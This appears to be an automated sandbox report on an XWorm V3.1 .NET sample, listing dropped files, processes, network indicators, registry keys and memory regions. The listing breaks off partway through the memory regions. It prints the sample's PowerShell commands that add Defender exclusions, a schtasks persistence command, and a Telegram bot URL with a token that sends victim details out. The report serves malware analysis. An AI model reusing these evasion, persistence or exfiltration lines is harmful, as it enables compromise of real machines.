Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
X1.exe
|
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
|
initial sample
|
 |
|
|
C:\Users\user\AppData\Roaming\X1.exe
|
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
|
dropped
|
|
|
|
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\X1.exe.log
|
CSV text
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
modified
|
||
|
C:\Users\user\AppData\Local\Temp\Log.tmp
|
Generic INItialization configuration [WIN]
|
modified
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_123w2fkx.ikl.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2cxmc25w.4f1.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4d2fw2xi.5gv.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dgs3p5sl.o23.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_evwaaysc.nmp.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fphbjhmb.yg2.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_iy1lxs5y.h1y.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ql5jmojq.uno.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rzifhzxd.zaq.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sycgtlw4.p4f.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_t052sswx.rqc.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uxg5afyd.ynp.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\X1.lnk
|
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Tue Apr 23 23:55:18
2024, mtime=Tue Apr 23 23:55:21 2024, atime=Tue Apr 23 23:55:21 2024, length=48128, window=hide
|
dropped
|
There are 8 hidden files, click here to show them.
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Users\user\Desktop\X1.exe
|
"C:\Users\user\Desktop\X1.exe"
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\X1.exe'
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'X1.exe'
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\X1.exe'
|
|
|
|
C:\Windows\System32\schtasks.exe
|
"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "X1" /tr "C:\Users\user\AppData\Roaming\X1.exe"
|
|
|
|
C:\Users\user\AppData\Roaming\X1.exe
|
"C:\Users\user\AppData\Roaming\X1.exe"
|
|
|
|
C:\Users\user\AppData\Roaming\X1.exe
|
"C:\Users\user\AppData\Roaming\X1.exe"
|
|
|
|
C:\Users\user\AppData\Roaming\X1.exe
|
C:\Users\user\AppData\Roaming\X1.exe
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
There are 2 hidden processes, click here to show them.
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
91.92.252.220
|
|
||
|
http://pesterbdd.com/images/Pester.png
|
unknown
|
|
|
|
http://nuget.org/NuGet.exe
|
unknown
|
||
|
https://api.telegram.org/bot
|
unknown
|
||
|
http://schemas.xmlsoap.org/soap/encoding/
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
|
https://api.telegram.org/bot2128988424:AAEkYnwvOQA95riqRZwlqBxg4GV-odRNOyo/sendMessage?chat_id=966649672&text=%E2%98%A0%20%5BXWorm%20V3.1%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0AB98DB222DCA51DFE7851%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro
|
149.154.167.220
|
||
|
http://schemas.xmlsoap.org/wsdl/
|
unknown
|
||
|
https://contoso.com/
|
unknown
|
||
|
https://nuget.org/nuget.exe
|
unknown
|
||
|
https://contoso.com/License
|
unknown
|
||
|
https://contoso.com/Icon
|
unknown
|
||
|
https://aka.ms/pscore68
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
|
https://github.com/Pester/Pester
|
unknown
|
||
|
http://ip-api.com/line/?fields=hosting
|
208.95.112.1
|
There are 6 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
ip-api.com
|
208.95.112.1
|
||
|
api.telegram.org
|
149.154.167.220
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
91.92.252.220
|
unknown
|
Bulgaria
|
|
|
|
208.95.112.1
|
ip-api.com
|
United States
|
||
|
149.154.167.220
|
api.telegram.org
|
United Kingdom
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\X1_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\X1_RASAPI32
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\X1_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\X1_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\X1_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\X1_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\X1_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\X1_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\X1_RASMANCS
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\X1_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\X1_RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\X1_RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\X1_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\X1_RASMANCS
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile
|
X1
|
There are 5 hidden registries, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
2E51000
|
trusted library allocation
|
page read and write
|
|
|
|
C52000
|
unkown
|
page readonly
|
|
|
|
2EBA000
|
trusted library allocation
|
page read and write
|
|
|
|
24725455000
|
trusted library allocation
|
page read and write
|
||
|
139E000
|
stack
|
page read and write
|
||
|
7FF848E10000
|
trusted library allocation
|
page read and write
|
||
|
24721B7C000
|
heap
|
page read and write
|
||
|
7FF848FF0000
|
trusted library allocation
|
page execute and read and write
|
||
|
206E7DE0000
|
heap
|
page read and write
|
||
|
2473B6A9000
|
heap
|
page read and write
|
||
|
1D528000
|
stack
|
page read and write
|
||
|
7FF848E24000
|
trusted library allocation
|
page read and write
|
||
|
F32000
|
heap
|
page read and write
|
||
|
1600000
|
heap
|
page read and write
|
||
|
2472545A000
|
trusted library allocation
|
page read and write
|
||
|
7DF41B7A0000
|
trusted library allocation
|
page execute and read and write
|
||
|
1CF30000
|
heap
|
page read and write
|
||
|
7FF848E34000
|
trusted library allocation
|
page read and write
|
||
|
7FF848FC0000
|
trusted library allocation
|
page execute and read and write
|
||
|
2473BF2C000
|
heap
|
page read and write
|
||
|
20680BFD000
|
trusted library allocation
|
page read and write
|
||
|
945D2B9000
|
stack
|
page read and write
|
||
|
7FF848EB6000
|
trusted library allocation
|
page read and write
|
||
|
7FF848FC0000
|
trusted library allocation
|
page read and write
|
||
|
BB0000
|
heap
|
page read and write
|
||
|
16F6132E000
|
heap
|
page read and write
|
||
|
7FF848EBC000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FF848FC0000
|
trusted library allocation
|
page read and write
|
||
|
16F58B51000
|
trusted library allocation
|
page read and write
|
||
|
206E7DB0000
|
heap
|
page read and write
|
||
|
16F4A47A000
|
trusted library allocation
|
page read and write
|
||
|
1CAF0000
|
heap
|
page read and write
|
||
|
1805000
|
heap
|
page read and write
|
||
|
7FF848F80000
|
trusted library allocation
|
page read and write
|
||
|
1C716000
|
stack
|
page read and write
|
||
|
945D07D000
|
stack
|
page read and write
|
||
|
31F0000
|
heap
|
page execute and read and write
|
||
|
16F4989D000
|
trusted library allocation
|
page read and write
|
||
|
7FF848FB0000
|
trusted library allocation
|
page execute and read and write
|
||
|
945CE7E000
|
stack
|
page read and write
|
||
|
206E97D0000
|
trusted library allocation
|
page read and write
|
||
|
16F49AEC000
|
trusted library allocation
|
page read and write
|
||
|
307F5FE000
|
stack
|
page read and write
|
||
|
1650000
|
heap
|
page read and write
|
||
|
16F473F5000
|
heap
|
page read and write
|
||
|
7FF849246000
|
trusted library allocation
|
page read and write
|
||
|
945D43E000
|
stack
|
page read and write
|
||
|
2473BCC0000
|
heap
|
page read and write
|
||
|
7FF848E00000
|
trusted library allocation
|
page read and write
|
||
|
7FF848FAA000
|
trusted library allocation
|
page read and write
|
||
|
7FF848E02000
|
trusted library allocation
|
page read and write
|
||
|
16F48A60000
|
trusted library allocation
|
page read and write
|
||
|
2473BE68000
|
heap
|
page read and write
|
||
|
13F6000
|
heap
|
page read and write
|
||
|
206EA0D6000
|
heap
|
page read and write
|
||
|
7FF849040000
|
trusted library allocation
|
page read and write
|
||
|
1BD10000
|
heap
|
page read and write
|
||
|
1BAAE000
|
stack
|
page read and write
|
||
|
16F58B21000
|
trusted library allocation
|
page read and write
|
||
|
13218000
|
trusted library allocation
|
page read and write
|
||
|
206E9EF4000
|
heap
|
page read and write
|
||
|
1BCB1000
|
heap
|
page read and write
|
||
|
16F6111B000
|
heap
|
page read and write
|
||
|
7FF8490B0000
|
trusted library allocation
|
page read and write
|
||
|
206E7E66000
|
heap
|
page read and write
|
||
|
162F000
|
stack
|
page read and write
|
||
|
945D239000
|
stack
|
page read and write
|
||
|
12D58000
|
trusted library allocation
|
page read and write
|
||
|
7FF849123000
|
trusted library allocation
|
page read and write
|
||
|
7FF849020000
|
trusted library allocation
|
page read and write
|
||
|
7FF848E2D000
|
trusted library allocation
|
page execute and read and write
|
||
|
206902EA000
|
trusted library allocation
|
page read and write
|
||
|
7FF848FF0000
|
trusted library allocation
|
page read and write
|
||
|
24721B5C000
|
heap
|
page read and write
|
||
|
307FB79000
|
stack
|
page read and write
|
||
|
9BD60FE000
|
stack
|
page read and write
|
||
|
16F6141D000
|
heap
|
page read and write
|
||
|
7FF8490D0000
|
trusted library allocation
|
page read and write
|
||
|
247248DF000
|
trusted library allocation
|
page read and write
|
||
|
7FF848DF4000
|
trusted library allocation
|
page read and write
|
||
|
9BD5FFE000
|
stack
|
page read and write
|
||
|
206E9B30000
|
trusted library allocation
|
page read and write
|
||
|
7FF849165000
|
trusted library allocation
|
page read and write
|
||
|
20680BFF000
|
trusted library allocation
|
page read and write
|
||
|
945DF8E000
|
stack
|
page read and write
|
||
|
7FF849000000
|
trusted library allocation
|
page read and write
|
||
|
16F49BB8000
|
trusted library allocation
|
page read and write
|
||
|
7FF849280000
|
trusted library allocation
|
page read and write
|
||
|
7FF849162000
|
trusted library allocation
|
page read and write
|
||
|
7FF848EB6000
|
trusted library allocation
|
page read and write
|
||
|
1C720000
|
heap
|
page read and write
|
||
|
23295AD5000
|
heap
|
page read and write
|
||
|
7FF8490D0000
|
trusted library allocation
|
page read and write
|
||
|
7FF848FB0000
|
trusted library allocation
|
page read and write
|
||
|
206E97C0000
|
trusted library section
|
page read and write
|
||
|
1675000
|
heap
|
page read and write
|
||
|
E70000
|
trusted library allocation
|
page read and write
|
||
|
7FF849200000
|
trusted library allocation
|
page read and write
|
||
|
206E7E69000
|
heap
|
page read and write
|
||
|
16F4709C000
|
heap
|
page read and write
|
||
|
E00000
|
heap
|
page read and write
|
||
|
89F2A79000
|
stack
|
page read and write
|
||
|
16F48D49000
|
trusted library allocation
|
page read and write
|
||
|
24721ED5000
|
heap
|
page read and write
|
||
|
1360000
|
heap
|
page read and write
|
||
|
7FF848DF3000
|
trusted library allocation
|
page execute and read and write
|
||
|
9BD5AFE000
|
stack
|
page read and write
|
||
|
945CEF9000
|
stack
|
page read and write
|
||
|
16F470E3000
|
heap
|
page read and write
|
||
|
12EB9000
|
trusted library allocation
|
page read and write
|
||
|
16F49ABA000
|
trusted library allocation
|
page read and write
|
||
|
16F611F0000
|
heap
|
page read and write
|
||
|
9BD5783000
|
stack
|
page read and write
|
||
|
7FF849210000
|
trusted library allocation
|
page read and write
|
||
|
7FF849130000
|
trusted library allocation
|
page read and write
|
||
|
23295A40000
|
heap
|
page read and write
|
||
|
7FF849170000
|
trusted library allocation
|
page read and write
|
||
|
2473BEF4000
|
heap
|
page read and write
|
||
|
16F58B41000
|
trusted library allocation
|
page read and write
|
||
|
307F87E000
|
stack
|
page read and write
|
||
|
2473BF08000
|
heap
|
page read and write
|
||
|
9BD5CF7000
|
stack
|
page read and write
|
||
|
1420000
|
heap
|
page read and write
|
||
|
7FF8490C0000
|
trusted library allocation
|
page read and write
|
||
|
24721B6A000
|
heap
|
page read and write
|
||
|
EC0000
|
heap
|
page read and write
|
||
|
13CA000
|
heap
|
page read and write
|
||
|
9BD5E76000
|
stack
|
page read and write
|
||
|
16F61390000
|
heap
|
page read and write
|
||
|
206902F8000
|
trusted library allocation
|
page read and write
|
||
|
16F470BC000
|
heap
|
page read and write
|
||
|
1BC50000
|
heap
|
page read and write
|
||
|
7FF848E30000
|
trusted library allocation
|
page read and write
|
||
|
307F5BE000
|
stack
|
page read and write
|
||
|
307FD7E000
|
stack
|
page read and write
|
||
|
16F49C48000
|
trusted library allocation
|
page read and write
|
||
|
7FF849262000
|
trusted library allocation
|
page read and write
|
||
|
20680086000
|
trusted library allocation
|
page read and write
|
||
|
2473BF58000
|
heap
|
page read and write
|
||
|
1B79D000
|
stack
|
page read and write
|
||
|
7FF849152000
|
trusted library allocation
|
page read and write
|
||
|
3000B0D000
|
stack
|
page read and write
|
||
|
307FF7B000
|
stack
|
page read and write
|
||
|
945D0F8000
|
stack
|
page read and write
|
||
|
7FF848DE4000
|
trusted library allocation
|
page read and write
|
||
|
16F48A80000
|
trusted library allocation
|
page read and write
|
||
|
20690031000
|
trusted library allocation
|
page read and write
|
||
|
1CCF4000
|
heap
|
page read and write
|
||
|
7FF849020000
|
trusted library allocation
|
page read and write
|
||
|
16F47030000
|
heap
|
page read and write
|
||
|
206EA0B0000
|
heap
|
page read and write
|
||
|
247243AB000
|
trusted library allocation
|
page read and write
|
||
|
F19000
|
heap
|
page read and write
|
||
|
7FF848ED0000
|
trusted library allocation
|
page read and write
|
||
|
2473BC02000
|
heap
|
page read and write
|
||
|
7FF848FA0000
|
trusted library allocation
|
page execute and read and write
|
||
|
307FE7C000
|
stack
|
page read and write
|
||
|
7FF848E30000
|
trusted library allocation
|
page read and write
|
||
|
7FF848EC6000
|
trusted library allocation
|
page execute and read and write
|
||
|
1BD44000
|
heap
|
page read and write
|
||
|
1B1CD000
|
stack
|
page read and write
|
||
|
2473BCAC000
|
heap
|
page read and write
|
||
|
7DF4F6950000
|
trusted library allocation
|
page execute and read and write
|
||
|
206E98E0000
|
heap
|
page execute and read and write
|
||
|
206811E3000
|
trusted library allocation
|
page read and write
|
||
|
1620000
|
heap
|
page read and write
|
||
|
2473B660000
|
trusted library allocation
|
page read and write
|
||
|
136D000
|
heap
|
page read and write
|
||
|
7FF849080000
|
trusted library allocation
|
page read and write
|
||
|
945D4BB000
|
stack
|
page read and write
|
||
|
247246CC000
|
trusted library allocation
|
page read and write
|
||
|
7FF849230000
|
trusted library allocation
|
page execute and read and write
|
||
|
945E08C000
|
stack
|
page read and write
|
||
|
20680A52000
|
trusted library allocation
|
page read and write
|
||
|
20681DE0000
|
trusted library allocation
|
page read and write
|
||
|
7FF849010000
|
trusted library allocation
|
page read and write
|
||
|
7FF848E04000
|
trusted library allocation
|
page read and write
|
||
|
2473BF67000
|
heap
|
page read and write
|
||
|
1D428000
|
stack
|
page read and write
|
||
|
321C000
|
trusted library allocation
|
page read and write
|
||
|
7FF8491FC000
|
trusted library allocation
|
page read and write
|
||
|
7FF848F20000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FF848FD0000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FF849020000
|
trusted library allocation
|
page read and write
|
||
|
945DF0D000
|
stack
|
page read and write
|
||
|
7FF848EBC000
|
trusted library allocation
|
page execute and read and write
|
||
|
11E1000
|
heap
|
page read and write
|
||
|
7FF849070000
|
trusted library allocation
|
page read and write
|
||
|
20680C07000
|
trusted library allocation
|
page read and write
|
||
|
2473BDC8000
|
heap
|
page read and write
|
||
|
7FF849150000
|
trusted library allocation
|
page read and write
|
||
|
1BD5E000
|
stack
|
page read and write
|
||
|
7FF848DF2000
|
trusted library allocation
|
page read and write
|
||
|
13D0000
|
heap
|
page read and write
|
||
|
16F61079000
|
heap
|
page read and write
|
||
|
7FF849070000
|
trusted library allocation
|
page read and write
|
||
|
16F61336000
|
heap
|
page read and write
|
||
|
1C4AD000
|
stack
|
page read and write
|
||
|
1725000
|
heap
|
page read and write
|
||
|
2473BEA9000
|
heap
|
page read and write
|
||
|
7FF848EA0000
|
trusted library allocation
|
page read and write
|
||
|
7FF848FD4000
|
trusted library allocation
|
page read and write
|
||
|
206811AF000
|
trusted library allocation
|
page read and write
|
||
|
7FF848E1D000
|
trusted library allocation
|
page execute and read and write
|
||
|
BC0000
|
heap
|
page read and write
|
||
|
14E5000
|
heap
|
page read and write
|
||
|
24723540000
|
heap
|
page readonly
|
||
|
16F613F4000
|
heap
|
page read and write
|
||
|
2473BF4F000
|
heap
|
page read and write
|
||
|
7FF849050000
|
trusted library allocation
|
page read and write
|
||
|
20680001000
|
trusted library allocation
|
page read and write
|
||
|
16C0000
|
trusted library allocation
|
page read and write
|
||
|
7FF848DFD000
|
trusted library allocation
|
page execute and read and write
|
||
|
23295868000
|
heap
|
page read and write
|
||
|
7FF848FF0000
|
trusted library allocation
|
page execute and read and write
|
||
|
1160000
|
trusted library allocation
|
page read and write
|
||
|
2D5C000
|
trusted library allocation
|
page read and write
|
||
|
16F615E0000
|
heap
|
page read and write
|
||
|
14E0000
|
heap
|
page read and write
|
||
|
16F49B26000
|
trusted library allocation
|
page read and write
|
||
|
7FF848E0B000
|
trusted library allocation
|
page read and write
|
||
|
7FF849168000
|
trusted library allocation
|
page read and write
|
||
|
16F58E18000
|
trusted library allocation
|
page read and write
|
||
|
16F6140B000
|
heap
|
page read and write
|
||
|
206E9B40000
|
heap
|
page execute and read and write
|
||
|
9BD6D4D000
|
stack
|
page read and write
|
||
|
206EA1A5000
|
heap
|
page read and write
|
||
|
24721B66000
|
heap
|
page read and write
|
||
|
2473BF14000
|
heap
|
page read and write
|
||
|
16F6131C000
|
heap
|
page read and write
|
||
|
17D5000
|
heap
|
page read and write
|
||
|
16F48AC0000
|
heap
|
page read and write
|
||
|
1BD74000
|
heap
|
page read and write
|
||
|
16F470A6000
|
heap
|
page read and write
|
||
|
11E4000
|
heap
|
page read and write
|
||
|
945E10D000
|
stack
|
page read and write
|
||
|
9BD57CE000
|
stack
|
page read and write
|
||
|
206E97F0000
|
trusted library allocation
|
page read and write
|
||
|
7FF848E20000
|
trusted library allocation
|
page read and write
|
||
|
12F1000
|
stack
|
page read and write
|
||
|
307FFBE000
|
stack
|
page read and write
|
||
|
7FF848FD0000
|
trusted library allocation
|
page execute and read and write
|
||
|
2473BDD0000
|
heap
|
page read and write
|
||
|
1C2ED000
|
stack
|
page read and write
|
||
|
206EA490000
|
heap
|
page read and write
|
||
|
127C000
|
heap
|
page read and write
|
||
|
7FF848E4C000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FF848E03000
|
trusted library allocation
|
page execute and read and write
|
||
|
945D33E000
|
stack
|
page read and write
|
||
|
16F49719000
|
trusted library allocation
|
page read and write
|
||
|
7FF848F30000
|
trusted library allocation
|
page execute and read and write
|
||
|
2473BCA2000
|
heap
|
page read and write
|
||
|
7FF848E1D000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FF848E10000
|
trusted library allocation
|
page read and write
|
||
|
307FA77000
|
stack
|
page read and write
|
||
|
24733937000
|
trusted library allocation
|
page read and write
|
||
|
7FF848ED0000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FF8491E0000
|
trusted library allocation
|
page read and write
|
||
|
206E9800000
|
heap
|
page read and write
|
||
|
24723883000
|
trusted library allocation
|
page read and write
|
||
|
2D40000
|
heap
|
page execute and read and write
|
||
|
7FF849266000
|
trusted library allocation
|
page read and write
|
||
|
1CFA2000
|
heap
|
page read and write
|
||
|
7FF848FE0000
|
trusted library allocation
|
page execute and read and write
|
||
|
9BD6B4F000
|
stack
|
page read and write
|
||
|
7FF8490E0000
|
trusted library allocation
|
page read and write
|
||
|
24723625000
|
heap
|
page read and write
|
||
|
16F47060000
|
heap
|
page read and write
|
||
|
3000A8C000
|
stack
|
page read and write
|
||
|
7FF848FC0000
|
trusted library allocation
|
page execute and read and write
|
||
|
247245CF000
|
trusted library allocation
|
page read and write
|
||
|
16F6132B000
|
heap
|
page read and write
|
||
|
1BBAE000
|
stack
|
page read and write
|
||
|
3251000
|
trusted library allocation
|
page read and write
|
||
|
7FF849060000
|
trusted library allocation
|
page read and write
|
||
|
7FF848FE2000
|
trusted library allocation
|
page read and write
|
||
|
1211000
|
heap
|
page read and write
|
||
|
2472497A000
|
trusted library allocation
|
page read and write
|
||
|
7FF848FE4000
|
trusted library allocation
|
page read and write
|
||
|
16F49CFE000
|
trusted library allocation
|
page read and write
|
||
|
7FF848EA0000
|
trusted library allocation
|
page read and write
|
||
|
16F4707E000
|
heap
|
page read and write
|
||
|
7FF848E0D000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FF848E7C000
|
trusted library allocation
|
page execute and read and write
|
||
|
3210000
|
heap
|
page execute and read and write
|
||
|
12D51000
|
trusted library allocation
|
page read and write
|
||
|
EB8000
|
heap
|
page read and write
|
||
|
16F4A92B000
|
trusted library allocation
|
page read and write
|
||
|
7FF84916C000
|
trusted library allocation
|
page read and write
|
||
|
16F49DCC000
|
trusted library allocation
|
page read and write
|
||
|
20681E2A000
|
trusted library allocation
|
page read and write
|
||
|
F90000
|
unkown
|
page readonly
|
||
|
7FF849120000
|
trusted library allocation
|
page read and write
|
||
|
7FF849180000
|
trusted library allocation
|
page read and write
|
||
|
190F000
|
stack
|
page read and write
|
||
|
24724082000
|
trusted library allocation
|
page read and write
|
||
|
7FF849120000
|
trusted library allocation
|
page read and write
|
||
|
1BFCE000
|
stack
|
page read and write
|
||
|
7FF849160000
|
trusted library allocation
|
page read and write
|
||
|
129D000
|
heap
|
page read and write
|
||
|
16F61300000
|
heap
|
page read and write
|
||
|
1B82B000
|
stack
|
page read and write
|
||
|
16F470A4000
|
heap
|
page read and write
|
||
|
16F49EE8000
|
trusted library allocation
|
page read and write
|
||
|
7FF848FA2000
|
trusted library allocation
|
page read and write
|
||
|
7FF8490C0000
|
trusted library allocation
|
page read and write
|
||
|
7FF849240000
|
trusted library allocation
|
page read and write
|
||
|
1339000
|
heap
|
page read and write
|
||
|
3200000
|
heap
|
page execute and read and write
|
||
|
206E9960000
|
heap
|
page read and write
|
||
|
1340000
|
heap
|
page read and write
|
||
|
24725435000
|
trusted library allocation
|
page read and write
|
||
|
2473BE95000
|
heap
|
page read and write
|
||
|
945CFF7000
|
stack
|
page read and write
|
||
|
16F48A25000
|
heap
|
page read and write
|
||
|
16F49DFF000
|
trusted library allocation
|
page read and write
|
||
|
24721B62000
|
heap
|
page read and write
|
||
|
16F611FA000
|
heap
|
page read and write
|
||
|
89F2AFF000
|
unkown
|
page read and write
|
||
|
1CF6B000
|
heap
|
page read and write
|
||
|
206E9850000
|
trusted library allocation
|
page read and write
|
||
|
138D000
|
heap
|
page read and write
|
||
|
7FF848F10000
|
trusted library allocation
|
page execute and read and write
|
||
|
1BBDE000
|
stack
|
page read and write
|
||
|
7FF849154000
|
trusted library allocation
|
page read and write
|
||
|
945E00C000
|
stack
|
page read and write
|
||
|
1180000
|
trusted library allocation
|
page read and write
|
||
|
16F48B10000
|
heap
|
page execute and read and write
|
||
|
136C000
|
heap
|
page read and write
|
||
|
20681311000
|
trusted library allocation
|
page read and write
|
||
|
307F53E000
|
stack
|
page read and write
|
||
|
2D51000
|
trusted library allocation
|
page read and write
|
||
|
7FF848FB1000
|
trusted library allocation
|
page read and write
|
||
|
20681096000
|
trusted library allocation
|
page read and write
|
||
|
1B8EF000
|
stack
|
page read and write
|
||
|
206E7ED2000
|
heap
|
page read and write
|
||
|
7FF8490F0000
|
trusted library allocation
|
page read and write
|
||
|
1BE2F000
|
stack
|
page read and write
|
||
|
20681786000
|
trusted library allocation
|
page read and write
|
||
|
1399000
|
heap
|
page read and write
|
||
|
1630000
|
heap
|
page read and write
|
||
|
EF8000
|
heap
|
page read and write
|
||
|
16F4A41B000
|
trusted library allocation
|
page read and write
|
||
|
16F61130000
|
heap
|
page execute and read and write
|
||
|
2473BBB0000
|
heap
|
page execute and read and write
|
||
|
1BCFB000
|
heap
|
page read and write
|
||
|
2473BC17000
|
heap
|
page read and write
|
||
|
7FF848EE6000
|
trusted library allocation
|
page execute and read and write
|
||
|
16F4709E000
|
heap
|
page read and write
|
||
|
7FF849190000
|
trusted library allocation
|
page read and write
|
||
|
7FF849000000
|
trusted library allocation
|
page read and write
|
||
|
7FF849158000
|
trusted library allocation
|
page read and write
|
||
|
7FF848F90000
|
trusted library allocation
|
page read and write
|
||
|
206E7FD0000
|
heap
|
page read and write
|
||
|
23295860000
|
heap
|
page read and write
|
||
|
7FF848E4C000
|
trusted library allocation
|
page execute and read and write
|
||
|
2473386B000
|
trusted library allocation
|
page read and write
|
||
|
1BECE000
|
stack
|
page read and write
|
||
|
2473BDC4000
|
heap
|
page read and write
|
||
|
2473BDCC000
|
heap
|
page read and write
|
||
|
7FF848E5C000
|
trusted library allocation
|
page execute and read and write
|
||
|
307FCF7000
|
stack
|
page read and write
|
||
|
16F61030000
|
heap
|
page read and write
|
||
|
7FF849030000
|
trusted library allocation
|
page read and write
|
||
|
3211000
|
trusted library allocation
|
page read and write
|
||
|
1800000
|
heap
|
page read and write
|
||
|
138B000
|
heap
|
page read and write
|
||
|
20681129000
|
trusted library allocation
|
page read and write
|
||
|
16F48A20000
|
heap
|
page read and write
|
||
|
206E9EEA000
|
heap
|
page read and write
|
||
|
2473C0B0000
|
heap
|
page read and write
|
||
|
206E9790000
|
heap
|
page read and write
|
||
|
16F610F7000
|
heap
|
page read and write
|
||
|
16F49D37000
|
trusted library allocation
|
page read and write
|
||
|
7FF849150000
|
trusted library allocation
|
page read and write
|
||
|
7FF848EC0000
|
trusted library allocation
|
page read and write
|
||
|
7FF848E00000
|
trusted library allocation
|
page read and write
|
||
|
1C8A0000
|
heap
|
page execute and read and write
|
||
|
7FF848E03000
|
trusted library allocation
|
page execute and read and write
|
||
|
206E9890000
|
trusted library allocation
|
page read and write
|
||
|
16F473F0000
|
heap
|
page read and write
|
||
|
7FF848EA0000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FF848EB0000
|
trusted library allocation
|
page read and write
|
||
|
12D53000
|
trusted library allocation
|
page read and write
|
||
|
E99000
|
heap
|
page read and write
|
||
|
7FF848F40000
|
